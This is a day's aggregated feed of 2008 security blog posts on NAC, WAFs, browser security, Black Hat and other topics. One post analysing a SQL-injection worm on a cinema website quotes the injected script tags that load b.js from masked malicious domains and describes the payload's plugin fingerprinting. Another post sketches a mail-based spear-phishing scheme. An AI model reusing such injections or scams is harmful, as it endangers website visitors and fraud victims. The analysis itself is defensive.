Saturday, June 28, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Maybe the NAC used car salesman can claim them as a customer too? In NAC quality counts! [StillSecure, After All These Years]

Posted: 27 Jun 2008 11:36 PM CDT

Dark Reading had a good article today talking about GuideWorks, the TV Guide/Comcast joint venture's 2 year odyssey with NAC, which finds them finally starting to see some good results. I immediately went to the website of the NAC used car salesman to see if they claimed them as a NAC customer too, but didn't see anything yet. But with those guys you never know.

Seriously though folks, this story is a classic NAC story. GuideWorks had guests and unmanaged users visiting their offices all the time. When they would ask to plug in they were told sorry, wait till you get back to your hotel. Over time this answer became unacceptable and they realized they needed a way to give these people a way to get on the net and get their email while keeping their network secure. This very same need drives many initial NAC deployments.

Like many other NAC customers they wanted something easy, not add major overhead or network changes and easy to administer. Again straight out of the NAC playbook. In the Summer of '06 they began a pilot of the Tipping Point NAC product which is based on the old Roving Planet technology. Now Roving Planet was more of a wireless security company, but near the end they rebranded themselves as NAC and Tipping Point uses that with their IPS devices to enforce. Best of all for GuideWorks the price was sub 10k.

Here is where the other side of NAC comes in. This is what the article says:

While NAC tools are often advertised as plug-and-play, GuideWorks found that the NAC setup required a high level of networking expertise. Fortunately, the Inglewood site had plenty of technical expertise because that's where many of the company's developers are stationed. In addition, GuideWorks put one of its front-desk employees in charge of setting up new accounts. But because her technical background was limited, the company had to walk her through a learning curve.

Now the company is planning to deploy the system at its Radnor office, which will be a bit more challenging since there's less technical expertise there, and that office gets a greater number of visitors. So GuideWorks has been on the search for employees to support the NAC system there. The company expects to have NAC up and running there by the end of the summer.

So 2 years after trial they are rolled out in one office and have to hire employees to support the NAC system at the next office. This was a problem with many of the failed NAC companies over the last few years and I think the problem with this Tipping Point solution. Just providing guest access should not be that hard! Yes the StillSecure Safe Access solution would have been much easier and faster to implement, but to be fair, any of the leading NAC solutions would have been up and running easier as well.

While this article was supposed to serve as reference and case study for the Tipping Point NAC solution, it is far from inspiring. If I were a customer looking into NAC, I don't think this would make run out and look at the Tipping Point solution. Moral of the story is, just because you made a good IPS doesn't mean you have a very good NAC product. When it comes to something like NAC, quality counts and buying a 2nd tier solution can cost you in time to implementation and total cost of ownership.

Zemanta Pixie

Micro-Blogging and Twitter [Donkey On A Waffle]

Posted: 27 Jun 2008 05:55 PM CDT

The jury is still out on Twitter. Micro-Blogging is for the times between face to face meetings, major blog posts, emails, instant messages, and phone calls. As if we don't have enough ways to communicate already, it appears as if we needed a way to publish every 10 seconds "what we are doing".

My first thought is "why?!". Do we really need to update everyone out there every time we eat a meal or take a shower? I'm doing my best to keep an open mind and I'm trying to give it a fair go, but I'm just not ready to see the benefit of this new technology. At best Twitter can be used to update people with regards to your current location so they can meet up with you at a local pub. To me it seems like a broadcast based IM system with mappings to SMS phone technologies. Maybe I'm just missing the point of it all.

I'm not even going to get into the privacy issues that are apparent with technologies like this. If people don't keep in mind what they are posting about they are likely to give away far too much information to the world. This is a much bigger problem than just Twitter (Facebook, Myspace, blogs in general, etc).

If you use and actually like micro-blogging technologies like Twitter, please leave a comment and explain why. Help me get into the year 2008.

Week of War on WAF’s: Day 5 — Final thoughts [tssci security]

Posted: 27 Jun 2008 04:17 PM CDT

Did we learn anything about web application firewall technology this week?

I hope so. However, my gut tells me there is an overriding feeling of ambiguity around this technology. People want WAFs, but they don’t know why. Organizations everywhere think this is the best or only short-term answer to the web application security problem.

The PCI SSC, who has set June 30th, 2008 as the deadline for compliance with Requirement 6.6, also appears to be wishy-washy on the whole deal. I read the following two articles this morning about PCI-DSS Requirement 6.6 and the use of web application firewalls. While the titles of the articles may appear many are still leaning on or towards WAFs — after reading the information and quotes, I think the titles might be misleading.

Web application security experts Mike Andrews and Robert Auger also have some interesting things to say. They seem to be very set on the idea that WAF (with proper blacklists) or VA+WAF (to manage the blacklists) are fair enough temporary solutions until organizations can implement secure coding.

Some interesting things can go wrong during the WAF implementation phase. I can identify the following problem areas that may have many organizations wondering why they went the WAF route:

  1. You think that a network engineer or network security expert could get up to speed quickly through training or lab-time. However, I think the average time to become a web application security expert is 3-4 years of specialization. Imagine how many developers could have been trained or worked on collaborative processes with IT security in that time period.
  2. Blacklist technology (especially VA+WAF) is going to help with false positives. However, what about general performance problems? If performance or availability issues occur, the first thing thrown out will be the WAF. What good is a device that is constantly removed from the architecture and then only put back in to meet compliance issues?
  3. There is a lot of technology out there to detect specific WAF products. It’s been written about in books. Attack tools such as w3af utilize plugins such as detectWAF. Vulnerabilities exist in WAF products in the same way that they exist in all software. Adversaries are already using this information to their advantage. Using a WAF can indeed make you less secure. In order to provide a product that will protect modern web applications, we must first test the products ourselves. There is more complexity in the average WAF than in the average Intranet web application — who is going to provide the countless hours of secure code review and manual pen-testing needed for these WAF products? Or are we going to use them blindly without considering the consequences?

What are some short-term alternatives?

  1. Multiple WAF solutions — one solution that focuses on “outbound” web traffic, and another that is tuned to your specific application (e.g. language, framework, components in use, et al). If your web application uses well-formed, valid XHTML — the outbound filtering requirement is already fulfilled. Refactoring your content to XHTML is a snap. Many books and tools exist to help in this process (Dreamweaver, xmllint, TagSoup, NekoHTML, and HTML Tidy just to name a few).
  2. A softer, lighter version of Agile/Test-first development practices with basic unit tests that correct input validation issues. This would be equivalent or better than WAF in practice. James Shore discusses how to implement this sort of idea in an article, Continuous Integration on a Dollar a Day.
  3. Even Aspect-oriented programming will show immediate value, as the cost proposition lowers when you already have the existing talent to implement AOP. If you have developers that know AspectJ — input validation routines can be added with point-cuts almost overnight.

The problem with these three short-term solutions is that they involve talking to your development teams. Do they have a reason to avoid using valid XHTML? Maybe their waterfall mindset precludes them from being able to move to a situation where “building code” is more important than “programming” (although I would argue that it’s a developer’s job to write buildable code).

What I think is most sad about the state of WAF technology is that a single, cheap developer could easily replace all of the normal WAF functionality in the code using basic unit testing. A talented developer who knew AOP could do much more than a WAF, and still at a much lower overall cost. Some organizations that are implementing WAF are having the developers manage the solutions instead of network engineers or IT security. We’re hoping that this situation will allow the developers to think up better ideas as well as learn where their applications are failing.

In fact, a non-developer: such as someone in marketing who uses Dreamweaver, could also do almost as much as a normal WAF by saving their content as valid XHTML. This would buy the organization basic application security functionality, which is what WAF also attempts to do.

Summary

We know that WAF’s appear to be the easiest answer to the PCI-DSS Requirement 6.6.  But what if there was an even more simple answer?  Talk with your QSAC, QSA auditor, and an external third-party such as a web application vulnerability assessor, software risk expert, or strategy consultant about possible compensating controls, such as:

  • Unit testing and integration unit testing for security properties as part of a daily, standard build
  • Aspects for security, written by a internal developer who can front the web application in a similar way, but that is closer to the code
  • Transformation of non-standard HTML to valid XHTML by a web designer or content manager

If you are going to choose a web application firewall, we suggest:

  • WAF solutions that have been security tested and risk assessed by third parties that specialize in security appliance/product assessments
  • A product that doesn’t affect performance because it only works on outbound traffic (not inbound), or only turns itself on when an attack is in-progress
  • Instructional capability and training for the solution is cheap/free, easy to find, and well-documented everywhere

Rich Mogull also has some very new suggestions that he would like to see as a future for WAF in his blog post, The Future of Application and Database Security: Part 2, Browser to WAF/Gateway.  It’s also worth a read!

The Future Of Application And Database Security: Part 2, Browser To WAF/Gateway [securosis.com]

Posted: 27 Jun 2008 03:12 PM CDT

Since Friday is usually “trash” day (when you dump articles you don’t expect anyone to read) I don’t usually post anything major. But thanks to some unexpected work that hit yesterday, I wasn’t able to get part 2 of this series out when I wanted to. If you can tear yourself away from those LOLCatz long enough, we’re going to talk about web browsers, WAFs, and web application gateways. These are the first two components of Application and Database Monitoring and Protection (ADMP), which I define as:

Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity.

Browser Troubles

As we discussed in part 1, one of the biggest problems in web application security is that the very model of the web browsers and the World Wide Web is not conducive to current security needs. Browsers are the ultimate mashup tool- designed to take different bits from different places and seamlessly render them into a coherent whole. The first time I started serious web application programming (around 1995/96) this blew my mind. I was able to embed disparate systems in ways never before possible. And not only can we embed content within a browser, we can embed browsers within other content/applications. The main reason, as a developer, I converted from Netscape to IE was that Microsoft allowed IE to be embedded in other programs, which allowed us to drop it into our thick VR application. Netscape was stand alone only; seriously limiting its deployment potential.

This also makes life a royal pain on the security front where we often need some level of isolation. Sure, we have the same-origin policy, but browsers and web programming have bloated well beyond what little security that provides. Same-origin isn’t worthless, and is still an important tool, but there are just too many ways around it. Especially now that we all use tabbed browsers with a dozen windows open all the time. Browsers are also stateless by nature, no matter what AJAX trickery we use. XSS and CSRF, never mind some more sophisticated attacks, take full advantage of the weak browser/server trust models that result from these fundamental design issues.

In short, we can’t trust the browser, the browser can’t trust the server, and individual windows/tabs/sessions in the browser can’t trust each other. Fun stuff!

WAF Troubles

I’ve talked about WAFs before, and their very model is also fundamentally flawed. At least how we use WAFs today. The goal of a WAF is, like a firewall, to drop known bad traffic or only allow known good traffic. We’re trying to shield our web applications from known vulnerabilities, just like we use a regular firewall to block ports, protocols, sources, and destinations. Actually, a WAF is closer to IPS than it is to a stateful packet inspection firewall.

But web apps are complex beasts; every single one a custom application, with custom vulnerabilities. There’s no way a WAF can know all the ins and outs of the application behind it, even after it’s well tuned. WAFs also only protect against certain categories of attacks- mostly some XSS and SQL injection. They don’t handle logic flaws, CSRF, or even all XSS. I was talking with a reference yesterday of one of the major WAFs, and he had no trouble slicing through it during their eval phase using some standard techniques.

To combat this, we’re seeing some new approaches. F5 and WhiteHat have partnered to feed the WAF specific vulnerability information from the application vulnerability assessment. Imperva just announced a similar approach, with a bunch of different partners.

These advances are great to see, but I think WAFs will also need to evolve in some different ways. I just don’t think the model of managing all this from the outside will work effectively enough.

Enter ADMP

The idea of ADMP is that we build a stack of interconnected security controls from the browser to the database. At all levels we both monitor activity and include enforcement controls. The goal is to start with browser session virtualization connected to a web application gateway/WAF. Then traffic hits the web server and web application server, both with internal instrumentation and anti-exploitation. Finally, transactions drop to the database, where they are again monitored and protected.200806271215.jpg

All of the components for this model exist today, so it’s not science fiction. We have browser session virtualization, WAFs, SSL-VPNs (that will make sense in a minute), application security services and application activity monitoring, and database activity monitoring. In addition to the pure defensive elements, we’ll also tie in to the applications at the design and code level through security services for adaptive authentication, transaction authentication, and other shared services (happy Dre? :) ). The key is that this will all be managed through a central console via consistent policies.

In my mind, this is the only thing that makes sense. We need to understand the applications and the databases that back them. We have to do something at the browser level since even proper parameterization and server side validation can’t meet all our needs. We have to start looking at transactions, business context, and content, rather than just packets and individual requests.

Point solutions at any particular layer have limited effectiveness. But if we stop looking at our web applications as pieces, and rather design security that addresses them as a whole, we’ll be in much better shape. Not that anything is perfect, but we’re looking at risk reduction, not risk elimination. A web application isn’t just a web server, just some J2EE code, or just a DB- it’s a collection of many elements working together to perform business transactions, and that’s how we need to look at them for effective security.

The Browser and Web Application Gateway

A little while back I wrote about the concept of browser session virtualization. To plagiarize myself and save a little writing time so I can get my behind to happy hour:

What we ideally need is a way to completely isolate our content in the browser. One way to do this is session virtualization, pioneered by GreenBorder, who was later acquired by Google (the GreenBorder site is just in support mode now). When a user connects to our site, we push down some code to create a virtual environment in the browser that we strictly control. We wall off that session, which could just be an isolated iFrame in a page, so that it only accesses content we send it. Basically, we break the normal browser model and hijack what we need. This would, for example, help stop CSRF since other browser elements won’t be able to trigger a connection to our application. Done right, it limits man in the middle attacks, even if the user authorizes a bad digital certificate.

To work properly, this needs to be tied to a gateway that controls the session. While we could do it from the web/app server itself, I suspect we’ll see this as a web application firewall feature, just as we see similar features from SSL-VPNs. I think isolated WAFs have a very limited lifespan, but this is exactly the kind of feature that will extend their value. Better yet, we can tie this in to our Application and Database Monitoring and Protection to build a browser-to-database protected path. We can completely track a transaction or piece of content from the database server to the browser and back.

We could even use this to isolate out potentially “bad” content in an in-browser sandbox. For example, it could be a way to enable all those social networking widgets in a more controlled way but locking in potentially bad content instead of known good.

Will this protect us from keystroke sniffers or a completely compromised host? Nope, but it will definitely help with a large number of our current browser security issues. If we combine it with full ADMP and additional methods like transaction authentication, I think we can regain a bit of control of the web application security mess.

Thus we see one migration path for a WAF. A user goes to connect to the application and hits the WAF, which is now more of a Web Application Gateway. The gateway, like an SSL-VPN, sends the session virtualization code down to the browser. We do this outside of the web application for performance reasons. The secure virtual session is established and the gateway then allows communications with the application behind it.

For things like retail and financial sites that include only limited third party content if any, we can monitor activity from the browser through to the application and work within the isolated session. It both improves our ability to control what’s being sent to the browser, and gives us a higher degree of confidence that what’s coming from the browser is safe. We still validate everything, but since we’re tied to the application itself we can validate in the browser and at the gateway before we even hit the app (and further validate there). Since in a controlled environment we know what transactions should be allowed (or not), we have more ability to detect and block “bad” transactions like SQL injection from the user.

In less controlled environments- thing MySpace or Gmail and everything in between- the gateway also becomes a filter for third party content. Like Checkpoint’s new ForceField. The gateway filters out, to the best of its ability, harmful third party content coming from third party sites. Basically, it becomes an SSL-VPN for secure browsing.

This is obviously not viable for all sites due to bandwidth considerations, and in those circumstances we’ll drop this part and stick to the rest of the ADMP stack, or only virtualize our pieces of content knowing the user is at risk for the third party stuff we’re still linking them to.

Future of the WAF, Option 2

I’ve just described a scenario where the WAF extends into a Secure Web Application Gateway that adds virtualization, encryption, and content filtering. That doesn’t mean WAFs won’t also still exist in non-virtualized situations, since that will still be a massive volume of sites out there.

For these sites the WAF continues to progress with deeper application integration and application understanding, and works with the elements I’ll describe later that will be embedded into the applications and databases. Rather than hanging around outside the application with barely any idea what’s going on behind it, the WAF will take its cues from the app, help manage sessions, and monitor activity outside the app to block the few things we know we can pick up at that layer.

Why use the WAF at all? To give us a choke point and offload some of the monitoring and processing that could hurt application performance. Let’s be honest- maybe WAFs will eventually go away, but performance problems alone will probably keep next-gen WAFs viable for a while. There are also plenty of things we can now block before they ever hit the application controls, which, by nature of being integrated at the app level, will be more complex and delicate.

But again, by tightly integrating with our other layers, instead of naievely assuming that an external black box will magically solve our problems, we get a much higher level of functionality. Feeding in vulnerability data as we’re just starting to do is a good beginning, but once we plug in deeper to the application and database servers we’ll get entirely new levels of functionality.

Part 2 Conclusions

What I’ve described today is how we can build a (more) trusted path from the browser to the face of the application. WAFs will add gateway capabilities, both protecting the applications behind them and the browsers in front of them. Since this won’t be the right approach in all circumstances, WAFs will also evolve with tighter integration to the application and other ADMP stack components.

Again, this might sound like little more than the usual analyst fiction, but all the components are here today. Also, I don’t expect my predictions to be totally accurate. I’m roughly guessing I’m at 85% or so.

Next week I’ll start digging into the application and database. We’ll talk about application instrumentation, anti-exploitation, DAM, trusted transaction paths, and shared security services.

That’s What I Want [un-excogitate.org]

Posted: 27 Jun 2008 12:08 PM CDT

It started with the online purchasing of movie tickets
Since I’ve been running with the NoScript addon within Firefox I’ve found that when pages try to load remote scripts they seem to be much more noticeable. This was particularly the case when over a month ago I was purchasing tickets online through one of our local, Australian cinema chains (Greater Union) and I ended up on the help page. In this instance, I had already temporarily allowed the primary site in NoScript so I could purchase the tickets (the site needed this functionality to work), but when the help page loaded NoScript advised me that there were another 6 domains with scripts that wanted to run. When I clicked the NoScript button at least 4 of those other domains did not appear legitimate, such as bin###.com, adw*.com, app##.com.

At the time I didn’t think much of this event and simply closed the help page and continued purchasing my tickets. I was in a rush of course and had to get to the movies to see Iron Man or something. A few days later I checked the page again and this time noticed that the scripts appeared to be pointing to different domains. When reviewing the HTML source it also became apparent that the javascript calls were not likely to be legitimate, as they seemed to be called inside ad-hoc <option> tags. For example:

<option value='cinebuzz_club#Cinebuzz Club<script src=http://www.hl***.com/b.js></script><script src=http://www.bin###.com/b.js></script><script src=http://www.apps##.com/b.js></script><script src=http://www.app##.com/b.js></script>'>Cinebuzz Club

The SQL Injection Worm
A quick Google search for “b.js” had a number of hits, but the article that provided the most information was the SANS Diary on “SQL Injection: More of the Same“. It appeared as if the first reported instance of this SQL Injection Worm was reported by SANS in May. The original summary of the vulnerability, as seen here, describes the javascript as opening a hidden iframe, which in turn opens up other iframes (dependent on your browser), eventually trying to download or execute a malicious piece of software.

The current incarnation of the site appears to be a little more advanced as the malicious domains hosting the b.js file appear to be fast-flux hosted, as written up here, and the content within the subsequent hidden iframe is obfuscated javascript (yay). But using the technique as described here (in fact the obfuscated javascript looked really similar) using Mozilla’s Rhino, the script eventually exposed the following logic:

  • Set default values for 4 variables
  • Loop through navigator.plugins looking for: QuickTime, Adobe Acrobat, Shockwave Flash
  • For each of the 3 plugins, set a value for against one of the first 3 variables, depending on subsequent logic that looks at version numbers for each plugin
  • Try and check that the video/x-ms-wmv is an enabled plugin, and set the 4th variable
  • Construct a new target script URL dependant on the above variables, for example: evil##.com/cgi-bin/index.cgi?c82fc0be071f01200077e0ed58020000000002804b628eff00 + var1 + var2 + var3 + var4

I haven’t had much luck in getting the target website to produce anything other than a HTTP 500 response, but I’m assuming that depending on the parameter passed to index.cgi the server then spews out a different exploit or piece of malware.

The Problem
The primary concern I have with this piece of malicious javascript is the fact that Greater Union actively advertises and insists that their customers use the online channel for purchasing tickets. In fact, they’ve made it increasingly difficult to purchase tickets at the cinema itself because you then lose the ability to choose your seats. The only way to guarantee particular seats is to buy your tickets online. So we’re stuck in a situation where we are recommended to purchase tickets online, the only method of course is by submitting credit card information, and other portions of the website are hosting malicious javascript exploited by an underlying SQL Injection vulnerability. How do we know that the ticket-purchasing portion of the website doesn’t have similar vulnerabilities? The short answer is we don’t.

What exacerbates this is the fact that it’s been over a month and the vulnerability has not been fixed. In fact, if the target domains keep on changing, it implies that the site keeps on getting exploited. The “baddies” are updating their code, updating the malicious payloads, and are re-exploiting this site over and over again. This certainly impacts upon my trust in them as a provider to keep my personal information/credit card information protected. If their site is susceptible to a SQL Injection worm, then someone doing targeting hacking against the site is likely to uncover all sorts of information.

What can we do?
Moving this forward and trying to provide some sort of assistance, a couple of things I would recommend if I were in their shoes would be:

  • Firstly I would find your vulnerability and patch/fix it. (There’s been a lot of talk about Scrawlr recently, that’s probably a good place to start).
  • Secondly I would review the rest of the code base for any similar issues.
  • Thirdly, start to put some strategy around embedding security within your development lifecycle (SDL/SDL-IT/Whatever), if it isn’t already in place.

The hidden gas tax [StillSecure, After All These Years]

Posted: 27 Jun 2008 12:03 PM CDT

 
ups receiptups 2 We all hate paying $75 dollars or more every time we fill up our gas tanks. When we see gas and oil prices hitting new highs (it seems to happen every day) we grimace and think about how much this is going to cost us as part of our weekly gas bills.  We get even more upset when the utility bills come and we see our summer time electric bills going through the roof because of fuel surcharges.

What about the price of food and other goods?  Have you noticed how much they are going up?  Bananas were 49 cents a pound and are now 69 cents a pound.  That is a huge increase.  Our government says core inflation is not going up outside of energy costs and I am not sure I believe that. We are seeing huge increases in rice, wheat and other staples.  But gas prices are a hidden tax on our economy across the board.

Have a look at the UPS receipt for a package that was shipped out to me.  From a base price of about $22.00, fuel surcharges add another 10 dollars to the bill. That is almost a 50% tax for fuel!  Add 50% to the cost of everything you buy and it is easy to see how this energy crisis is pushing us all to the breaking point.

We need a "send a man to the moon" effort to break free of oil and move to clean renewable, cheap energy now!

Here comes a big plate of suck [Vitalsecurity.org - A Revolution is the Solution]

Posted: 27 Jun 2008 11:52 AM CDT

I love me some useless "see lots of secret stuff on Myspace" nonsense. Whether it's lines of code, programs or websites, 99% of them are rubbish.

Here's one I saw being pimped on a site the other day:


Click to Enlarge

See if you can spot the faintly comical screwup in the next screenshot:


Click to Enlarge

.....hahaha.

There's quite a few sites out there like this one, and all of them eventually just dump you on a page imploring you to download Firefox. However, it seems they can't even get that right, because on all of the sites I've seen so far there's no download link to click.

Did I hahaha yet?

Breach got you down? [Branden Williams' Security Convergence Blog]

Posted: 27 Jun 2008 11:00 AM CDT

Well, it has happened again. I received a rather menacing looking note in the mail today. You know, one of those heavy stock sealed letters that has the perforated edges? Yeah. That kind.

Inside it looks like my information is on a lost tape from a bank. The funny thing is, I don't remember banking with this institution... ever. I have a feeling that one of the brokerage firms I use (or used) was backed by this institution, but nevertheless, I thought of an interesting type of phishing attack that I bet would work. When I looked through this notice, it did appear to have a corresponding breach on PrivacyRights.org. I have already placed my fraud alerts, so I should be good.

But what if it didn't? If I were to target specific individuals (i.e., spear phishing) and tell them that their information was compromised from a large bank and provided a number for them to call for more info, would they readily give me enough information to steal their identity? I think people have started to be wary about clicking on things or giving out information over email, but what about through the mail? Sure it won't have the same reach that electronic attacks will, but how much more lucrative could the loot get?

My thoughts are that it would work remarkably well against those individuals who don't have lawyers reading their mail, and especially some of the elderly population.

We're so big and other marketing games [StillSecure, After All These Years]

Posted: 27 Jun 2008 10:41 AM CDT

Andy Jaquith had a good post up that I first heard about from Mike Rothman's blog. Andy, fresh off of attending the Symantec Vision conference laments the obligatory "we're so big" slides that find themselves into almost every deck you see. Whether it is for analysts as Andy says or for customers or partners, from the biggest to the smallest, companies seek to show how good they are by how big they are. Numbers of customers, nodes, sensors, yada, yada. Usually these "we're so big" slides are followed by the obligatory circular diagrams that show the "life cycle" of the companies product or services being complete. After a while you seen one, you've seen them all.

But lets face it, even some of you men out there who may be resisting, size does matter! No one wants to say that we don't have the scale and success breeds success. It is just a fact of marketing. You will feel more comfortable if you see so many others (even brands you know) picking the same solution you are looking at. You feel good knowing that your vendor has an army of machines and/or people watching your back. Sounds better than 3 guys in a garage for sure.

It is all part of the marketing game. Those same rules say that if you repeat a story enough times, whether it is true or not, eventually people believe it. The bigger the lie, the more times you repeat it, the more people will believe it. But that should not stop others from pointing out the facts and doing their best to call out those who just cross the line with marketing claims that are not true.

Here is another pet peeve of mine. Why do analysts base their market size numbers on what vendors tell them they do in revenue. With the past performance of some of these vendors, I wouldn't put much weight into what they say they do for revenue. I think analysts need to show market size independent of vendor revenue reports unless they are in fact audited or some how verified.

SUN: Solaris 10 Multicast Critical Vulnerability Revealed [Infosecurity.US]

Posted: 27 Jun 2008 09:11 AM CDT

SUN Microsoystems, Inc. (NasdaqGS: JAVA) has announced a critical vulnerability (and the fix) for a multicast vulnerability in their Solaris 10 operating, considered by many to one of the most secure OSes available. SUN also credits Tobias Klein for discovery of this exploitable vulnerability and notifying the company of the issue. The original discovery [...]

FBI: Airlines Plead Guilty and Pay Criminal Fines [Infosecurity.US]

Posted: 27 Jun 2008 08:13 AM CDT

While not necessarily Information Security related, today brings news, in the form of an announcement by our Federal Bureau of Investigation, of several major airlines pleading guilty to anti-trust charges, in their misguided, and illegal attempts to fix prices on cargo transport. Kudos to our FBI in their investigation, and let’s not forget the Department [...]

Discovered: Cisco Unified Communications Manager DoS & Authentication Bypass Flaws [Infosecurity.US]

Posted: 27 Jun 2008 08:13 AM CDT

CISCO Systems Inc. (NasdaqGS: CSCO) has revealed recently discovered vulnerabilites plaguing their Unified Communcations Manager product. This time, a rather serious Denial of Service exploitable flaw, coupled with an equally damaging Authentication Bypass exploit. On the plus side, Cisco is certainly recognized, around here at least, as being significantly committed to responsive action when faced [...]

Information Requests for RSA Conference [RSA Conference - Blog]

Posted: 27 Jun 2008 08:07 AM CDT

UK: 25 Million Lost Child Care Records Spurs New Whitehat Program [Infosecurity.US]

Posted: 27 Jun 2008 07:50 AM CDT

News of a sea change in information security testing procedures, using Whitehat Hack resources from the government of the United Kingdom has surfaced. The report of the new measures comes from Chris Williams at The Register. Spurred on by the stunning notification of over 25 million lost child care records, Cabinet Secretary Gus O’Donnell is betting [...]

Leaves from the Tree 2008-06-27 [Birchtree Blog]

Posted: 27 Jun 2008 07:07 AM CDT

My, oh my. What did we have this week...

xkcd (the world's best web comic) had a story on why Wi Fi holes may be useful: "Road Rage".

Security - who needs it? - Yes, we've all been there.

And last not least, it's Bill Gates' last working day at Microsoft today. Definitely a man who has done a lot for our industry. How time passes! 1978 - 2008. Somehow reminds me of these folks. (By the way, wonder how Steve Jobs is doing?)

Download Hyper-V RTM for WIndows server 2008 [Jeff Jones Security Blog]

Posted: 26 Jun 2008 07:02 PM CDT

I converted my office fileserver to Windows Server 2008 (WS2008) a while back and I've never been happier - WS2008 is my favorite product ever.  Nicely modular, pretty much everything turned off by default and some great tools for enabling just the components your need for a particular role.

There is one more step I've been wanting to take and that is to enable the Hyper-V role and convert my fileserver over to just one virtual machine on the box, so I can set up other VMs on the same box.  Today, I was excited to see Microsoft Releases Hyper-V on CNET.  Here is a summary of the key links (note that it is only available for the 64-bit versions of WS2008):

Check back with my and I'll let you know how things go and share any tips I have for what to do or not do, as well as my review of how easy/hard it is.

Regards ~ Jeff

Why go to Black Hat? [CultSEC Blog]

Posted: 26 Jun 2008 04:32 PM CDT

Black Hat Security Bloggers NetworkThe Black Hat Conference has been going on for years. For me, I've always said I would like to get there some day. Instead, I've always opted for making it to the RSA conference because the companies I've worked for were willing to send me to one or the other each year.

I used to believe the Black Hat conference was on the forbidden list for those of us certified with CISSP. Maybe this was true. I did a quick scan of the ethics policy on www.isc2.org web. It touches on many points which could be argued for and against when deciding to attend conferences like the Black Hat. I would argue for attending because I've always believed I might actually learn something about tips and tricks I'm trying to protect against.

I also believed Black Hat was more technical in nature. As I continue in my career, where I've been managing for a good number of years, I drift further away from solid keyboard interactions. I did notice in this years track there are topics for folks like me. Even if I'm not a hard core hands on technical professional, it still is good to attend classes that are. For me it keeps me plugged in with how things work at that level, which helps me understand appropriate needs in managing security analysts.

Nowadays I don't worry as much about maintaining the status of my certifications. I always do my best to operate in an ethical manner and don't think attending venues, such as the Black Hat, would cause me to do something unethically.

At any rate, I am not planning to be there this year either. I've been to RSA. Perhaps next year, I'll opt for the Black Hat instead.

GCN: New Security Certification Rules [Infosecurity.US]

Posted: 26 Jun 2008 04:09 PM CDT

New federally mandated certification requirements for personnel granted paper certification by groups like the ISC2, could be (I would say will be) impacted by newly codified requirements. Via GCN.

CCTV - the secret [Roer.Com Information Security - Your source of Information Security]

Posted: 26 Jun 2008 02:21 PM CDT

Bruce offers a well worth read on CCTV today.

MindshaRE: Adding IDA to Explorer Context Handler [DVLabs: Blogs]

Posted: 26 Jun 2008 02:04 PM CDT

Posted by Cody Pierce

In this weeks MindshaRE we will show you how to add IDA into the right click context menu of windows explorer.  This is handy when quickly disassembling .dll's and .exe's.

MindshaRE is our weekly look at some simple reverse engineering tips and tricks.  The goal is to keep things small and discuss every day aspects of reversing.  You can view previous entries here by going through our blog history.

When disassembling binaries in IDA most people will go through a couple steps to load a new binary.  In the past I would first open IDA, locate the binary I want to disassemble, and drag it from the explorer window into the IDA MFC.  This is fine, but we are always looking for a more efficient way to work.

Adding IDA to the right click context menu in explorer is pretty simple.  This allows you to right click any binary you have set up for IDA to handle, and simply clicking "IDA" or whatever you want to label it.  By doing this we can disassembly target binaries with a few clicks.  There are several ways we can achieve this but I will present the one I use.  Here's the steps to accomplish this.
  1. Open "regedit.exe"
  2. Open the key "HKEY_CLASSES_ROOT"
  3. Locate the file extension class you want.* ("dllfile" and "exefile")
  4. Open the sub key "shell", it the key does not exist create it
  5. Create a new key
  6. Give it the text label you want displayed when you right click the file type
  7. Create another key under the label and name it "command"
  8. Open the "(Default)" key under the newly created label key
  9. Add the path to your installation of IDA Pro's idag.exe binary in double quotes followed by "%1"
  10. Repeat for any other file extensions you want
  11. Close "regedit.exe"
After you have added IDA to the extensions you want find a file to disassemble.  Right click the file, and select the label you added for IDA from the list.

Adding IDA to the context menu is a very simple action.  But if you are like me and use the application daily it can really help.  Thats all for this week, see you next week.

-Cody

Let’s Start At The Very Beginning [securosis.com]

Posted: 26 Jun 2008 01:44 PM CDT

Last week Jeremiah “Purple Belt” Grossman posted the following question:

“You're hired on at a new company placed in charge of securing their online business (websites). You know next to nothing about the technical details of the infrastructure other than they have no existing web/software security program and a significant portion of the organizations revenues are generated through their websites.

What is the very first thing do on day 1?”

Day one is going to be a long day, that’s for certain. Like several commentators on the original post, I’d start with talking with the people who own the application both at a business and technology level. Basically, this is a prime opportunity to not only understand what the goals of the business are but also get everyone’s perceptions of their needs, and equally important their perceptions of the cost of their systems being unavailable. The next few weeks would be used to determine where reality diverged from perception. But day one is when I get to make my first impression and if I can successfully convince people that I really am on their side, it will make the rest of my tenure much easier. I’ve found that I can do so by demonstrating that my prime concern is enabling the business to accomplish its goals with a minimum of hassle from me. One of the key ways of doing this is spending my time listening, and limiting my talking to asking questions that lead my interviewee to the necessary logical conclusions rather than being a dictator….

…not that I don’t reserve the right to hit things with a hammer later to protect the business, but day 1 sets the tone for the future, and that’s far more important than putting in X fix or blocking Y vulnerability.

Why Do I Attend BlackHat? [Zero in a bit]

Posted: 26 Jun 2008 01:33 PM CDT

This post is a response to Alan Shimel’s Topic of Interest #2 for the Security Bloggers Network.

So what motivates me to attend BlackHat? The #1 reason for me is networking — meeting new people and catching up with old friends and colleagues. Despite our best intentions, we are all busy and our networks are constantly expanding, making it increasingly difficult to stay in touch with old friends in the industry. Twitter and other forms of microblogging help you chip away at the communication gaps; you get a glimpse into peoples’ lives but it’s no replacement for a real conversation.

Obviously, the briefings themselves are a major draw. Even though it’s expanded to over 10 tracks now, the quality hasn’t suffered much. This year’s experiment with allowing paid delegates to vote on speakers seems to have produced a good lineup, though I’m sure there was still a selection committee that could and probably did overrule the votes in some cases. Either way, BlackHat presentations are a decent indicator of the overarching themes that will be prevalent in information security for the upcoming year or two.

When I first started attending BlackHat, I was drawn to the talks discussing 0-day vulnerabilities, tool releases, shellcode tricks, and the like. These days, anything relating to static analysis, automation, and of course web security are most interesting to me. I also consider who’s speaking, regardless of the topic (e.g. one of these guys presents, I’m there). In general, I’ll try to gauge how much value the speaker will add to the presentation — in other words, what do I gain by attending the talk vs. flipping through the slides later? I never attend every time slot; sometimes the hallway conversation is just more interesting.

Some of my other reasons for attending, in no particular order, most of which fall under the “networking” umbrella:

  • The parties (duh)
  • The Pwnie Awards
  • Meeting fellow security bloggers
  • Recruiting speakers for SOURCE
  • Finding future Veracode employees
  • Trading war stories
  • Picking up vendor schwag for my kids (RSA is much better for this one)
  • Meeting current and former customers — and future ones, hopefully

Things I could do without:

  • The cigarette smoke
  • The heat
